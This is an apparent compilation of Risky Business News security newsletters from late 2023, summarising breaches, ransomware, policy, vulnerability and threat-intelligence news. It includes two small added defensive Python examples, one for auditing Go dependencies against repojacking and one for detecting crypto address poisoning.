23AndMe breach: It appears that 23AndMe's legal team likes to play with their words. After downplaying their security breach and claiming that hackers accessed the data of 0.1% of its users, it turns out hackers accessed data on 6.9 million, representing almost half of the site's estimated 14 million total users. [Additional coverage in TechCrunch]

Tipalti ransomware attack: Payments software vendor Tipalti has confirmed it got hit by a ransomware attack after the AlphV group listed the company on its dark web leak site. The incident is unique because AlphV showed its intention to use the Tipalti data to extort some of its customers. The gang hinted at possible extortions of Roblox and Twitch, two of Tipalti's largest customers. [Additional coverage in The Record]

Screenshot of the Tipalti statement confirming the attack
Screenshot of the AlphV ransomware leak site listing Tipalti as a victim and threatening Roblox

General tech and privacy

Windows 10 ESU: Microsoft will offer three years of paid security updates for Windows 10 users after the operating system reaches its official end-of-support (EOS) date on October 14, 2025. Known as ESU (Extended Security Updates), this is the same type of paid extended support that Microsoft previously made available for Windows 7 users. This is Microsoft's third major ESU program after it announced a similar paid support scheme for Windows Server 2012/R2 users last month.

Zuckerberg buys Harvard's silence: Harvard University muzzled and then gutted a team of academics studying Facebook disinformation campaigns after Meta CEO Mark Zuckerberg donated $500 million to the university. The team was working on the Facebook Files, a collection of internal Meta documents leaked by whistleblower Frances Haugen.

Wikipedia toxicity: An academic paper has found that the rising number of toxic comments posted on Wikipedia is tied to the site losing some of its volunteers.

Elcomsoft-MKO lawsuit: Thomas Brewster looks at the lawsuit between Elcomsoft and MKO-Systems, two Russian companies specializing in iOS digital forensics services. The lawsuit hints at a possible iOS 16 zero-day used by Elcomsoft products, which Elcomsoft claims has been stolen by MKO. [Additional coverage in Forbes/non-paywall]

Government, politics, and policy

Pegasus case in Mexico: Mexico's former president, Enrique Peña Nieto, has allegedly ordered a spying operation against the country's two largest business figures, investor Carlos Slim and mining mogul Germán Larrea. The spying operation involved the NSO Group's Pegasus spyware, according to the testimony of a whistleblower in a trial that started in Mexico this week. Prosecutors believe the spyware was used to spy on thousands of victims across the private sector and government administrations. [Additional coverage in Expreso/English coverage in El País]

"The information provided by Zeus [the whistleblower] indicated that the espionage campaign had been carried out by a subsidiary of one of the suppliers of Pegasus in Mexico, the KBH business group."

Project PowerUp: Cisco Talos explains how the company helped Ukrainian authorities develop new equipment that can resist Russia's GPS jamming attacks and keep the country's power grid online in the face of mounting Russian electronic warfare.

Image of Cisco's PowerUp switches

Risky Business Podcasts

In this podcast, Patrick Gray and Tom Uren talk about how threat actors abusing legitimate tools (aka living off the land or LOLbins) is the new normal. Everyone is doing it, from activists to cybercriminals to nation-states. It's a worry because the defender's standard practices really aren't set up to detect and deal with that kind of behavior.

Cybercrime and threat intel

Raccoon dev extradition case: A judge has ruled that the Dutch government can extradite a Ukrainian national to the US to face charges for developing the Raccoon infostealer. Named Mark Sokolovsky, the suspect has been fighting his extradition since October of last year. His case revolved around claims that US authorities would treat him inhumanely and violate his human rights, accusations the judge found implausible. Sokolovsky was detained in early 2022, and his sudden disappearance following his arrest led to a hilarious situation where fellow malware developers thought he died in Ukraine following Russia's invasion.

Money mule arrests: Europol, Interpol, and law enforcement agencies from 26 countries have arrested 1,103 money mules in one of the largest crackdowns against money laundering operations. Officials say they also identified almost 11,000 money mules and their recruiters. More than 2,800 banks and financial institutions helped law enforcement in tracking down money mules and their networks.

Europol poster showing stats from their recent crackdown

Spyro1d: A new Android RAT named Spyro1d is being sold online somewhere. There were some rumors that it already got leaked on GitHub, but I could not find it. Instead, I found this new Windows infostealer named Laze.

Iranian hacktivism: Check Point says that Iranian hacktivist groups are expanding their activity beyond Israel to hit international targets in the context of the Israel-Hamas war. The four groups are Cyber Av3ngers, Haghjoyan, Cyber Toufan, and the YareGomnam Team.

Zarya attacks: SANS ISC researchers have spotted the Zarya pro-Kremlin hacktivist group hunting for unpatched Microsoft SharePoint servers.

Backdoored Cisco IOS XE devices: Almost two months after the attacks were disclosed, more than 23,000 Cisco IOS XE devices are still infected with a backdoor named BadCandy. The number of infected devices is down by just 46%, despite calls from several national CERTs and cybersecurity teams to patch devices and remove the backdoor. The devices were infected at the end of September after a yet-to-be-identified threat actor used a combination of two zero-days (CVE-2023-20273 and CVE-2023-20198) in Cisco's IOS XE operating system.

Malware technical reports

macOS proxy malware: Kaspersky researchers have spotted a proxy trojan targeting macOS users disguised in cracked macOS software.

P2PInfect: Cado Security has spotted a new version of the P2PInfect botnet targeting MIPS-based devices.

BlueSky ransomware: The DFIR Report team looks at attacks with the BlueSky ransomware, deployed on networks following brute-force attacks on MSSQL databases.

DanaBot: OALABS researchers have published IOCs and TTPs for the DanaBot malware.

SpyLoan: ESET looks at a class of Android spyware apps it calls SpyLoan that disguise themselves as loan apps. The apps were downloaded more than 12 million times and generally targeted users in Southeast Asia, Africa, and Latin America.

Sponsor Section

In this product demo, Senior Sales Engineer Ali Cheikh demonstrates the runZero platform to Risky Business host Patrick Gray.

APTs, cyber-espionage, and info-ops

Bluenoroff's RustBucket: Kaspersky researchers have looked at a macOS malware loader named RustBucket that has been used by North Korean hacking group Bluenoroff in its recent operations. See similar reports from Elastic, Sekoia, Jamf, and SentinelOne.

Doppelgänger: Recorded Future has spotted new info-op activity from Russian group Doppelgänger. The recent campaign targeted audiences in Ukraine, Germany, and the US using AI-generated content on fake news sites and social media accounts.

APT28 Outlook/Exchange attacks: Russian hacking group APT28 has continued to relentlessly exploit a former Outlook zero-day (CVE-2023-23397) throughout the year, even after Microsoft rolled out patches for the bug in March. APT28 used the zero-day to steal NTLM passwords from unpatched systems and then pivot to internal networks from one single compromised host. Besides the Outlook zero-day, the group also used password spraying attacks to gain access to Exchange email servers and steal inbox content. According to reports from Microsoft, Proofpoint, and Poland's Cyber Command, the campaign targeted a wide range of organizations across Europe and North America and didn't appear to have lost any steam after Microsoft rolled out patches. The APT28 group has been linked to Russia's GRU military intelligence service.

Bar chart showing APT28 activity in 2023
Image: Proofpoint

Vulnerabilities, security research, and bug bounty

Android security updates: The monthly security updates for Android smartphones are out. The December update includes fixes for three zero-days Qualcomm reported under attack in October. Qualcomm also released details and patches for the three—tracked as CVE-2023-33106, CVE-2023-33107, and CVE-2023-33063.

Apache CouchDB security update: The Apache CouchDB team issued a rare security update, recommending that all users patch immediately.

Cisco vulnerability: Cisco has patched a Firepower VPN bug that was leaked online. No exploitation has been seen in the wild yet.

PsFree: A developer named CelesteBlue has published PsFree, a WebKit-based exploit for rooting PlayStation 4 and 5 systems.

Outlook attack vectors: Check Point researcher Haifei Li analyzes the attack surface of Microsoft Outlook.

Fake Lockdown Mode: Jamf researchers have developed a technique that can be used to fool users into thinking they enabled Lockdown Mode on their iPhones.

MTG Arena bug: SpecterOps researcher Daniel Mayer has found a bug in the Magic: The Gathering Arena game that could be abused to force opponents to concede games.

Train PLC research: A German security researcher named Q3k has found hidden code inside the Newag smart trains that would show bogus errors and lock up the train when it was serviced at third-party workshops.

Thirdweb vulnerability: Web3 software vendor Thirdweb has asked developers to take steps to mitigate a vulnerability the company found in its smart contract SDK. Thirdweb says the vulnerability impacts more than 20 popular smart contracts. Any company that deployed a smart contract with the Thirdweb SDK before November 22 is considered vulnerable and exposed to crypto-asset thefts. The company says it has not observed any exploitation of the bug prior to its disclosure.

MW WP Form vulnerability: Wordfence researchers have found an unauthenticated file upload vulnerability in the MW WP Form plugin that can lead to arbitrary code execution. Tracked as CVE-2023-6316, the vulnerability has a severity rating of 9.8/10. The plugin is currently installed on more than 200,000 WordPress sites, making it ideal for mass exploitation.

ColdFusion exploitation: A threat actor is exploiting an Adobe ColdFusion vulnerability patched in March to gain access to US government systems. CISA says the attackers have compromised and backdoored two servers in operations in June and July. The ColdFusion vulnerability was a zero-day (CVE-2023-26360) when it was patched in March, but it's unclear if this is the same original attacker.

SLAM: VUSec researchers have published details on SLAM, a new Spectre-like side-channel attack on Intel, AMD, and Arm CPUs.

EXOS vulnerabilities: Rhino Security has found and helped patch four vulnerabilities in EXOS, the operating system running on ExtremeNetworks switches.

"At the time of these findings, there were over 1000 devices exposed to the internet running the vulnerable EXOS versions, determined using a Shodan search."

ownCloud vulnerabilities: French security firm Ambionics looks at the technical details behind two recent ownCloud vulnerabilities that are being exploited in the wild.

Hugging Face token leaks: Lasso Security has found more than 1,600 API tokens for the Hugging Face AI development service exposed on the internet via GitHub repositories. The tokens allow attackers to access ML and AI-based tools developed using the Hugging Face service. Lasso says that some of the tokens belonged to large companies such as Microsoft, Meta, Google, and VMware.

Go repojacking: More than 15,000 Go libraries are managed through GitHub accounts that are vulnerable to repojacking attacks. According to security firm VulnCheck, more than 9,000 repositories are vulnerable to repojacking due to GitHub username changes, while another 6,000 are vulnerable to repojacking due to the original owner's account deletion. VulnCheck says that the 15,000 GitHub repos support more than 800,000 versions of Go modules, including some popular ones.

"Unfortunately, mitigating all of these repojackings is something that either Go or GitHub will have to take on. A third-party can’t reasonably register 15,000 GitHub accounts. Until then, it’s important for Go developers to be aware of the modules they use, and the state of the repository that the modules originated from."
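One way for Go developers to audit the modules they pull from GitHub, as an added example that is not VulnCheck's tooling or part of the newsletter: parse a go.mod file and flag modules whose GitHub owner has been renamed or deleted. The go.mod contents and the owner-status table are constructed; a real run would replace the table with a lookup against GitHub.

```python
"""Flag Go module dependencies whose GitHub repository could be repojacked.

Added example, not VulnCheck's tooling. It parses a go.mod file and checks
each github.com module path against an owner-status lookup. Network access
is replaced by a constructed lookup table so the example runs offline; in
practice the lookup would query GitHub for the owner and repository.
"""
import re

# Matches "github.com/<owner>/<repo>", including nested module paths such
# as github.com/owner/repo/v2 or github.com/owner/repo/sub/module.
_GITHUB_PATH = re.compile(r"^github\.com/([A-Za-z0-9_.-]+)/([A-Za-z0-9_.-]+)")


def parse_go_mod(text):
    """Return [(module_path, version)] from the require directives in a go.mod.

    Handles single-line requires and require ( ... ) blocks and strips
    trailing // comments such as "// indirect".
    """
    requires = []
    in_block = False
    for raw in text.splitlines():
        line = raw.split("//", 1)[0].strip()
        if not line:
            continue
        if line.startswith("require ("):
            in_block = True
            continue
        if in_block and line == ")":
            in_block = False
            continue
        if line.startswith("require "):
            line = line[len("require "):].strip()
        elif not in_block:
            continue  # module, go, replace, exclude, retract lines
        parts = line.split()
        if len(parts) == 2:
            requires.append((parts[0], parts[1]))
    return requires


def github_owner_repo(module_path):
    """(owner, repo) in lower case for GitHub-hosted modules, else None."""
    m = _GITHUB_PATH.match(module_path)
    return (m.group(1).lower(), m.group(2).lower()) if m else None


def audit(requires, owner_status):
    """Map each at-risk GitHub module path to a finding.

    owner_status maps a lower-case GitHub login to one of:
      "active"  - the account still exists under this name
      "renamed" - the account changed its name; the old name is re-registrable
      "deleted" - the account is gone; the name is re-registrable
    Owners missing from the table are reported as "unverified".
    """
    findings = {}
    for path, _version in requires:
        ident = github_owner_repo(path)
        if ident is None:
            continue  # not hosted on GitHub, outside this check's scope
        owner, _repo = ident
        status = owner_status.get(owner, "unverified")
        if status != "active":
            findings[path] = status
    return findings


# Constructed sample go.mod: one healthy dependency, one whose owner was
# renamed, one whose owner account was deleted, and one not on GitHub.
SAMPLE_GO_MOD = """\
module example.com/app

go 1.21

require github.com/Active-Dev/lib v1.4.0

require (
\tgithub.com/old-handle/parser v0.3.1
\tgithub.com/gone-user/helpers v2.0.0+incompatible // indirect
\tgolang.org/x/crypto v0.16.0
)
"""

# Constructed stand-in for a GitHub owner lookup.
SAMPLE_OWNER_STATUS = {
    "active-dev": "active",
    "old-handle": "renamed",
    "gone-user": "deleted",
}

if __name__ == "__main__":
    for path, finding in audit(parse_go_mod(SAMPLE_GO_MOD), SAMPLE_OWNER_STATUS).items():
        print(f"{path}: owner {finding}, verify the repository before trusting it")
```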

Bar chart showing the popularity of affected repos by their GitHub stars

Infosec industry

HIBP reaches 10 years: The Have I Been Pwned database is celebrating its 10th anniversary. Pwnage count is 731 databases and 12.8 billion accounts.

Acquisition news: Cloud security firm Wiz has acquired Raftt, a startup that provides easy-to-use developer-centric Kubernetes environments.

New tool—ADOKit: IBM's X-Force team has open-sourced ADOKit, a toolkit that can be used to attack Azure DevOps Services by taking advantage of the available REST API. A whitepaper is also available [PDF].

New tool—FARA: Security researcher Bart Blaze has released FARA, a repo with purposefully erroneous Yara rules, meant as a training vehicle for new security professionals.

New tool—Sonicwall-NSV-Decrypter: Security firm Praetorian has released a tool named Sonicwall-NSV-Decrypter that can be used to jailbreak Sonicwall NSv virtual firewall appliances and decrypt LUKS partitions.

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq talk about recent hints that the Ukrainian government has figured out how to make use of the IT Army.

Risky Biz News: ICANN launches RDRS to help cybersecurity professionals with domain investigations

4 December 2023 at 00:30

You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:

ICANN, the non-profit organization that manages domain names and IP addresses, has launched a new service to help law enforcement agencies and cybersecurity professionals obtain redacted and non-public data on domain owners.

Named the Registration Data Request Service (RDRS), the service works as a ticketing system that interconnects investigators with domain registrars—the smaller organizations that manage each TLD domain space.

The new system is designed to create private communication channels where investigators can file requests with domain registrars in a more centralized fashion.

Currently, investigators can file legal requests or abuse reports with each registrar, but the idea behind RDRS is to create a place where requests from "verified" parties can be honored faster and with a higher degree of trust.

The idea is not new, and such systems already exist for social networks, email providers, and cloud-hosting companies. These are specialized portals—managed by either the company or law enforcement—where agents can file requests about a company's users as part of emergency responses or ongoing investigations. Breaches in such systems have usually given hackers access to a wide spectrum of personal data.

ICANN says it launched the service after the EU passed the GDPR, a stringent data protection law that forced domain registrars to redact information on domain owners from their publicly available WHOIS databases.

Such information is still present in the private databases of domain registrars and has been made available to some organizations, but usually only in a very limited fashion, such as court orders, subpoenas, or following intelligence-sharing agreements.

However, the removal of WHOIS data from the public domain has, without a doubt, made the internet a worse place.

It allowed—and still allows—criminal, malware, and online fraud operations to hide and operate for longer times, as law enforcement and infosec professionals get bogged down in paperwork or never get answers from some registrars.

RDRS is most likely a step in the right direction, but as ICANN says on the portal's front page, the service is just a limited two-year "proof of concept" and may be abandoned.

Breaches, hacks, and security incidents

Trellance ransomware attack: About 60 US credit unions are dealing with network outages after a ransomware gang hit Trellance, one of their shared IT providers. The incident took place on Sunday, November 26, and is still ongoing, according to the US National Credit Union Administration. The full extent of the incident is still unknown, but Trellance is said to be rebuilding its systems. [Additional coverage in The Record]

Safe wallet hacks: A threat actor has stolen an estimated $5 million worth of crypto assets from the owners of Safe cryptocurrency wallets. Twenty-one victims have been identified so far. The hacks have taken place over the past four months, with ten victims losing more than $2 million over the past week alone. According to Web3 security firm ScamSniffer, the attackers used a technique known as "address poisoning." The technique involves flooding a victim with small transactions in order to poison their wallet history, in the hope that the victim later copies one of the wrong addresses and sends money to the threat actor.
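One way to triage a wallet history for the poisoning pattern described above, as an added example that is not code from the newsletter or from ScamSniffer: it flags incoming dust transfers from senders that copy an address-book entry's visible prefix and suffix, and classifies a destination before sending. The addresses, display widths and dust threshold are constructed assumptions.

```python
"""Triage a wallet's transaction history for address-poisoning attempts.

Added example, not code from the newsletter or from ScamSniffer. The
addresses, display widths and dust threshold below are constructed.
"""
from dataclasses import dataclass

# Wallet UIs usually show only the first and last few characters of an
# address, so a poisoned address only has to match those visible parts.
# Assumed display widths; adjust to the wallet being modelled.
PREFIX_LEN = 6
SUFFIX_LEN = 4


@dataclass(frozen=True)
class Tx:
    counterparty: str   # the other party's address
    direction: str      # "in" (received) or "out" (sent)
    amount: float       # value transferred, in the asset's main unit


def _body(addr: str) -> str:
    """Lower-case hex body of an address with any 0x prefix removed."""
    a = addr.strip().lower()
    return a[2:] if a.startswith("0x") else a


def looks_like(candidate: str, trusted: str) -> bool:
    """True if candidate shows the same visible prefix and suffix as trusted
    but is a different address (the address-poisoning pattern)."""
    c, t = _body(candidate), _body(trusted)
    if c == t or len(c) != len(t):
        return False
    return c[:PREFIX_LEN] == t[:PREFIX_LEN] and c[-SUFFIX_LEN:] == t[-SUFFIX_LEN:]


def find_poisoned(history, address_book, dust_threshold):
    """Return (suspect_address, mimicked_address) pairs for incoming transfers
    at or below dust_threshold whose sender impersonates an address-book entry."""
    hits = []
    for tx in history:
        if tx.direction != "in" or tx.amount > dust_threshold:
            continue
        for trusted in address_book:
            if looks_like(tx.counterparty, trusted):
                hits.append((tx.counterparty, trusted))
    return hits


def classify_destination(dest, address_book):
    """Pre-send check: 'trusted' only on a full-string match with the address
    book, 'lookalike' if it merely resembles an entry, otherwise 'unknown'."""
    if _body(dest) in {_body(a) for a in address_book}:
        return "trusted"
    if any(looks_like(dest, t) for t in address_book):
        return "lookalike"
    return "unknown"


# Constructed sample data: one real exchange deposit address, one poisoned
# address that copies its visible prefix and suffix, and one unrelated address.
TRUSTED_EXCHANGE = "0x" + "a1b2c3d4e5f6" + "0" * 24 + "9f8e"
POISONED = "0x" + "a1b2c3" + "f" * 30 + "9f8e"
UNRELATED = "0x" + "7" * 40

SAMPLE_HISTORY = [
    Tx(TRUSTED_EXCHANGE, "out", 1.5),
    Tx(POISONED, "in", 0.0),       # zero-value dust transfer, the poisoning step
    Tx(UNRELATED, "in", 2.0),
]

if __name__ == "__main__":
    for suspect, mimicked in find_poisoned(SAMPLE_HISTORY, [TRUSTED_EXCHANGE], 0.001):
        print(f"history entry {suspect} mimics {mimicked}")
    print(classify_destination(POISONED, [TRUSTED_EXCHANGE]))  # lookalike
```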

Unitronics hacking spree: The US government has confirmed that an Iranian hacking group named Cyber Av3ngers has gained access to equipment at water facilities across multiple US states. CISA, the FBI, the NSA, and other agencies say the attacks began as far back as November 22 and exploited PLCs manufactured by Israeli company Unitronics. The group targeted Unitronics PLCs that were still using the default password "1111." CISA asked US organizations last week to change the default password, enable MFA, and remove the devices from the internet. US officials say the Cyber Av3ngers group is affiliated with the IRGC, an Iranian military and intelligence organization. According to the Shadowserver Foundation, between 500 and 800 Unitronics PLCs are currently exposed on the internet, with the vast majority in Australia and Singapore.

General tech and privacy

US TikTok ban fails in court: A judge shot down Montana's attempt to formally and fully block the TikTok app across the state. The ban was meant to go into effect on January 1, 2024. The judge ruled that the ban violated the US Constitution's First Amendment in more ways than one. [Additional coverage in NPR]

Google RCS: Google says its RCS messaging system is now enabled on more than one billion Android devices.

Government, politics, and policy

New SSSCIP head: The Ukrainian government has appointed Yurii Myronenko as the new head of the State Service of Special Communications and Information Protection of Ukraine (SSSCIP). Myronenko was appointed after the government sacked the previous head, Yurii Shchyhol, following an investigation into alleged embezzlement. Prior to his appointment, Myronenko was a UAV strike squadron commander for SSSCIP.

UK Online Fraud Charter: Twelve of the world's largest tech companies have agreed to introduce new rules to fight online fraud as part of a new agreement signed with the UK government named the Online Fraud Charter. New measures include verifying new advertisers, promptly removing any fraudulent content, and better user verification for online marketplaces and dating services. The companies will also establish direct lines for law enforcement to report fraudulent content. The 12 signatories include Amazon, eBay, Facebook, Google, Instagram, LinkedIn, the Match Group, Microsoft, Snapchat, TikTok, Twitter, and YouTube.

EU Cyber Resilience Act: The European Council and the European Parliament have reached a political agreement on the Cyber Resilience Act, a piece of legislation meant to improve the security of smart devices sold in the EU. The new regulation applies to products ranging from baby monitors and smartwatches to firewalls and routers. Under the new rules, vendors will have to establish processes to receive reports about vulnerabilities and must support products for at least five years. Products will have to come with free and automatic security updates as the default option, must ensure data confidentiality using encryption, and vendors must inform authorities of any attacks. The new rules will come into effect three years after the CRA is formally voted on the EU Parliament floor.

EU Cyber Force: In a speech last week, European Council president Charles Michel advocated for the creation of an EU cyber force with "offensive capabilities."

Wyden blocks Haugh vote: Oregon senator Ron Wyden says he intends to block the vote for Lt. Gen. Timothy Haugh to serve as director of the National Security Agency (NSA). Sen. Wyden says he intends to block a vote until "the NSA discloses whether it is buying Americans' location data and web browsing records."

US Federal Cybersecurity Workforce Expansion Act: US lawmakers have introduced bipartisan, bicameral legislation that will create two new cybersecurity training programs with the federal government. Named the Federal Cybersecurity Workforce Expansion Act, the bill is one of the many recent attempts by the US government to address its existing cybersecurity workforce shortage. Under the bill, one of the training programs will be run by CISA, while the other will be housed by the Department of Veterans Affairs and will be exclusively available to veterans.

State Department reward: The US State Department is offering a $10 million reward for information on new methods and technologies used by North Korean hackers to launder their funds. The reward was put up a day after the US seized and sanctioned Sinbad, a cryptocurrency mixing service used by DPRK hackers to launder hacked crypto funds.

House hearing on supply chain security: The House Subcommittee on Cybersecurity, Information Technology, and Government Innovation held a hearing on the state of software supply chain security last week.

Risky Business Podcasts

In this podcast, Patrick Gray and Tom Uren talk about how threat actors abusing legitimate tools (aka living off the land or LOLbins) is the new normal. Everyone is doing it, from activists to cybercriminals to nation-states. It's a worry because the defender's standard practices really aren't set up to detect and deal with that kind of behavior.

Cybercrime and threat intel

Platypus hackers freed in France: A French court has set free two suspects accused of stealing $9.5 million worth of crypto assets from DeFi platform Platypus Finance in February this year. Aged 20 and 18, Mohammed M. and Benamar M. were arrested a week after the hack in the Paris suburb of Aubervilliers. The two brothers claimed in court they acted in good faith and were just conducting white-hat ethical hacking. The duo said they found a vulnerability in the Platypus platform and moved the funds before a hacker could steal them. [Additional coverage in LeMonde/non-paywall]

Trickbot member pleads guilty: A Russian national has pleaded guilty to his role in developing and deploying the Trickbot malware. As part of the Trickbot gang, Vladimir Dunaev developed browser modifications and malicious tools that aided Trickbot in stealing credentials and deploying additional malware on infected computers. Dunaev was arrested in late 2021 after getting stuck in South Korea due to COVID-19 travel restrictions. He was extradited to the US and charged a month later. Dunaev now faces a maximum penalty of 35 years in prison.

New npm malware: Twenty-one malicious npm packages were discovered last week. Check out GitHub's security advisory portal for more details.

Cyber Toufan wiping campaign: A pro-Palestinian hacktivist group named Cyber Toufan is conducting data-wiping campaigns. The group claims it is attacking companies supporting Israel, but we all know they're just hitting anyone with an exposed system and re-framing it as "hacktivism" in the context of the Israel-Hamas war.

New Twisted Spider activity: A threat actor known as Twisted Spider is using the DanaBot malware to gain access to corporate networks and then deploy the Cactus ransomware via hands-on activity. Spotted by Microsoft, the initial DanaBot infections occur via malvertising campaigns. The Twisted Spider group appears to have switched to using DanaBot for initial access after authorities took down the QakBot botnet at the end of August. Twisted Spider is a known affiliate for different ransomware services, such as REvil, Maze, and Egregor.

UAC-0006: Ukraine's CERT team has published a report on UAC-0006, a cybercrime group that has recently targeted members of the Ukrainian society to steal funds from their accounts. The group's primary tool has been SmokeLoader.

AeroBlade: A threat actor named AeroBlade is targeting organizations in the US aerospace sector with the goal of conducting commercial cyber espionage. Discovered by BlackBerry's security team, the group appears to have set up infrastructure in September 2022 and began attacks in July this year. AeroBlade's modus operandi includes phishing operations and the deployment of reverse shells for future reconnaissance.

M-13 profile: Security firm StrikeSource looks at M-13, a Russian company that provides software to the Russian government. Its offerings include the likes of Katyusha, Arena, Arsenal, and Strike. All are tools to mine and monitor news platforms and social media. Its owner, Vladislav Klyushin, was sentenced to nine years in prison in the US for hacking companies and making $93 million on the stock market using the stolen files.

"M-13's offerings are lackluster, to say the least, and far less than what would be hoped for from an organization with ties to the GRU. In comparison to what was seen with NTC Vulkan, M-13's capabilities make it seem as though the software side of its business was merely a front for its hacking and fraud operations which behind the scenes were used to enrich Klyushin and his co-defendants to the tune of tens of millions."

Amadey interview: A security researcher named G0njxa has interviewed InCrease, the author of the Amadey loader.

Internet bot traffic: An Arkose Labs report [PDF] has found that automated bots accounted for roughly 73% of the internet traffic the company monitored throughout the third quarter of 2023. Not all bots were malicious, and some were used for automation and other tasks. According to the company, the top web threats they tracked in Q3 were fake account creation, account takeovers, and web scraping.

Lumma campaign: The Perception Point team looks at a recent phishing campaign delivering the Lumma Stealer.

Booking campaign: Secureworks analyzes a phishing campaign targeting Booking.com users with the Vidar infostealer.

WP phishing campaign: A threat actor is posing as the WordPress security team in a phishing campaign targeting owners of WordPress sites. The campaign is advertising a patch for a non-existent CVE (CVE-2023-45124) and lures site admins into installing a backdoored plugin.

Malware technical reports

Stealc: MSSP Lab has published a two-part series on Stealc, a new infostealer that has been advertised on the cybercrime underground since the start of the year. Additional information via Sekoia, too.

DanaBot: CyFirma researchers look at DanaBot, a versatile malware strain that has been going around since 2018.

Turtle ransomware: Researchers have found a new ransomware strain named Turtle that can encrypt files on Windows, Linux, and macOS systems.

Akira ransomware: French security firm Intrinsec has published a technical report on the typical operations of an Akira ransomware intrusion.

Sponsor Section

In this product demo, Senior Sales Engineer Ali Cheikh demonstrates the runZero platform to Risky Business host Patrick Gray.

APTs, cyber-espionage, and info-ops

US Treasury sanctions Kimsuky: The US Treasury Department has sanctioned North Korean hacking group Kimsuky for its intelligence collection operations. The group has been active since 2012 and operates under the Reconnaissance General Bureau (RGB), North Korea's primary foreign intelligence service. It is also known in infosec nomenclature as APT43, Emerald Sleet, Velvet Chollima, TA406, and Black Banshee. Kimsuky joins the likes of Lazarus, Andariel, and Bluenoroff, three other North Korean hacking groups sanctioned in September 2019.

APT-C-28 (ScarCruft): Chinese security firm Qihoo 360 has published a report on North Korean hacking group APT-C-28 (ScarCruft, Reaper, APT37) and its recent campaigns delivering the Chinotto backdoor.

CL-STA-0002: PAN Unit42 researchers have identified a new APT group that has recently carried out operations against organizations in the Middle East, Africa, and the US. Tracked as CL-STA-0002, evidence suggests the group has been active since 2020. Unit42 says the group used custom malware (Agent Racoon, Ntospy, Mimilite) and is most likely a state-sponsored group.

Weekly dose of dumb Russian propaganda: A network of pro-Kremlin online accounts tried to blame a recent storm in Crimea on the US using "climate weapons" in Ukraine. I guess the "bio labs" shtick got old and boring with the troll farm employees.

Vulnerabilities, security research, and bug bounty

French govt bug bounty program: The French government will pay up to €20,000 to bug hunters to find vulnerabilities in its FranceConnect and AgentConnect online platforms. The two are authentication systems used by regular citizens and government employees to log into official government sites. This is the second bug bounty program the French government has set up this year after launching a similar effort for the maProcuration attorney-finding platform in May. [Additional coverage in Le Parisien]

CISA KEV update: CISA has removed a D-Link router vulnerability tracked as CVE-2022-28958 from the KEV database of actively exploited vulnerabilities. CISA says it removed the KEV entry after the vulnerability's CVE identifier was revoked. MITRE withdrew the identifier after VulnCheck researcher Jacob Baines discovered that the vulnerability never existed and filed a dispute to have it removed from the National Vulnerability Database.

EPSS intro: Patrick Garrity, VP of Marketing and security researcher at Nucleus Security, has published a 14-minute introduction to the Exploit Prediction Scoring System (EPSS). Managed by FIRST, the system is currently supported alongside CVSS by more than 50 security products.

Connected zero-days: A Chrome zero-day and two Safari zero-days that were patched last week are connected, according to Google TAG researcher Maddie Stone.

VMware security update: VMware has finally released a software patch for a security flaw it first announced two weeks ago in the Cloud Director Appliance, tracked as CVE-2023-34060.

Zoom vulnerability: AppOmni researchers have identified a vulnerability in the Zoom web conferencing service that could have allowed threat actors to hijack Zoom Rooms.

Vulnerabilities in court case systems: Security researcher Jason Parker has discovered multiple vulnerabilities in the web-based case and document management systems used by multiple US courts. The vulnerabilities could have allowed threat actors to access sensitive court records related to civil and criminal cases. Although most of the affected courts have rolled out patches, not all of them have. [Additional coverage in TechCrunch]

O-RAN vulnerabilities: Trend Micro researchers have identified vulnerabilities in the Open Radio Access Network (O-RAN) mobile specification that can be used to crash or spoof information inside a crucial component of 5G network architectures.

Infosec industry

Nullcon 2023 videos: Talks from the Nullcon 2023 security conference, which took place in September, are available on the conference's official website.

New tool—Tricard: Unicorn Security has open-sourced a tool named Tricard that can fingerprint and detect malware sandboxes.

New tool—ASRGEN: Splunk's Michael Haag has released a tool named ASRGEN that can test configurations that can reduce a system's attack surface. The code is on GitHub as well.

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq talk about the latest Russian cyber attacks on the Ukrainian energy grid.

Risky Biz News: Black Basta group made $107 million from ransom payments

1 December 2023 at 00:30

This newsletter is brought to you by Corelight. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:

The Black Basta ransomware gang is believed to have made more than $107 million in ransom payments since the group began operations in early 2022.

The number represents payments made by more than 90 victims of the 329 organizations known to have been hit by the gang.

The largest payment was $9 million, while the average ransom payment was $1.2 million, according to joint research published by blockchain tracking company Elliptic and cyber insurance provider Corvus Insurance.

Although all ransomware "earnings" estimates are extremely inaccurate, this would put Black Basta in the upper echelon of the "best-earning" ransomware groups of the past years.

  • Ryuk – $150 million

  • REvil – $123 million in 2020

  • Lockbit – $91 million from January 2020 to June 2023 (US only)

  • Darkside – $90 million between October 2020 and May 2021

  • Maze/Egregor – $75 million

  • Cuba – $43.9 million throughout 2021

  • Conti – $25.5 million between July and November 2021

  • Netwalker – $25 million between March and July 2020

  • Dharma – $24 million between November 2016 and November 2019

The group began operations in early 2022, appearing shortly after the implosion of the Conti group, itself a Ryuk rebrand.

It is widely believed in the infosec community that former members of the Conti gang splintered off and created multiple ransomware gangs after the gang's demise in early 2022—precipitated by a dox of Conti operations, itself caused by Conti admins proclaiming their allegiance to Russia following its invasion of Ukraine.

Together with Akira, BlackSuit, and Royal, Black Basta is one of the four main post-Conti ransomware gangs (as per independent security experts, RedSense, IBM X-Force, Trend Micro, and NCC Group).

In its dying days, Conti denied any affiliation with the group, which is why some companies still don't track Black Basta as a Conti offshoot. With the Conti source code leaked online, they might be right, or they might have been trying to sabotage an unwanted competitor—we'll never know.

While the gang advertised its Ransomware-as-a-Service portal in underground forums for weeks, the first actual Black Basta attacks were spotted in the wild in April 2022, when the group's ransomware strain was also detected.

Since then, the gang's tactics have revolved around two ways of breaching their victims. The first relies on exploiting recently patched vulnerabilities in networking and enterprise applications (e.g., CitrixBleed, PrintNightmare, ZeroLogon). The second relies on buying access to corporate networks infected by other malware gangs (e.g., SystemBC, PikaBot, Qakbot).

A SentinelOne report claims Black Basta may have also started working with the FIN7 threat actor or at least recruited former FIN7 developers. With the cybercrime ecosystem being a mess of shady connections and a limited coding talent pool, this isn't that hard to believe.

